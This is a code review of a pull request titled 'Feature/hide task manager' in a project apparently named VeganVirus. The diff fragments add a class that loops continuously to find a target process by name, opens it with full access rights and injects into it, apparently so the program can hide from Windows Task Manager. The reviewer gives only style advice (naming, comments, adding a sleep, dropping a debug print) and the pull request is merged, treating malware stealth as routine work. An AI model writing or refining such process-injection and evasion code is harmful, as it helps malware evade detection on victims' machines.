### PR TITLE
Feature/hide task manager

### PR DESCRIPTION
**Pull request by arielsokolsky**

### CODE REVIEW

File: VeganVirus/VeganVirus/TaskManager.cpp [hunk 1]
```diff
@@ -0,0 +1,104 @@
...
+
+DWORD WINAPI MyThreadFunction(LPVOID lpParam);
+
+DWORD WINAPI MyThreadFunction(LPVOID lpParam)
+{
+	while (1)
+	{
+		taskManager.findProcess(INJECT_INTO);
+	}
+}
```
Comment (Alon-Regev) [inline VeganVirus/VeganVirus/TaskManager.cpp]: Change function name to a more descriptive one. Also, you can remove the declaration right before the definition of the function.
Also, please try to add a Sleep to the thread every iteration. Maybe around 5-10 seconds? No reason for it to constantly run.

File: VeganVirus/VeganVirus/TaskManager.cpp [hunk 2]
```diff
@@ -0,0 +1,104 @@
...
+		// create const char for string comparison
+		_bstr_t b(pEntry.szExeFile);
+		if (strcmp(b, name) == 0)
+		{
+			// get handle
+			hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, (DWORD)pEntry.th32ProcessID);
+			if (hProcess)
+			{
+				injectProcess(hProcess);
+				std::cout << hProcess << std::endl;
```
Comment (Alon-Regev) [inline VeganVirus/VeganVirus/TaskManager.cpp]: Shouldn't print the handle.

File: VeganVirus/VeganVirus/TaskManager.h [hunk 3]
```diff
@@ -0,0 +1,26 @@
...
+
+class TaskManager
+{
+public:
+	void start();
+	void findProcess(const char* name);
+private:
+	void injectProcess(HANDLE);
+	
+	HANDLE _thread;
```
Comment (Alon-Regev) [inline VeganVirus/VeganVirus/TaskManager.h]: You should add comments to all methods.

File: VeganVirus/VeganVirus/TaskManager.h [hunk 4]
```diff
@@ -0,0 +1,26 @@
...
+};
+
+static TaskManager taskManager;
```
Comment (Alon-Regev) [inline VeganVirus/VeganVirus/TaskManager.h]: Don't make a global TaskManager variable. Initialize a variable inside of the main function `WinMain`.
Also, consider changing the name of the class to a more descriptive one. Maybe `TaskManagerHide`?

**Review by Alon-Regev — COMMENTED** [review]
Good job, just a few tiny changes.
Make sure everything works after this changes, especially if the sleep in the thread doesn't cause problems for the actions!

File: VeganVirus/VeganVirus/TaskManager.cpp (hunk 2 above)
Comment (arielsokolsky) [reply VeganVirus/VeganVirus/TaskManager.cpp]: fix

File: VeganVirus/VeganVirus/TaskManager.cpp (hunk 1 above)
Comment (arielsokolsky) [reply VeganVirus/VeganVirus/TaskManager.cpp]: fix

File: VeganVirus/VeganVirus/TaskManager.h (hunk 3 above)
Comment (arielsokolsky) [reply VeganVirus/VeganVirus/TaskManager.h]: fix

File: VeganVirus/VeganVirus/TaskManager.h (hunk 4 above)
Comment (arielsokolsky) [reply VeganVirus/VeganVirus/TaskManager.h]: fix

**Pull request merged**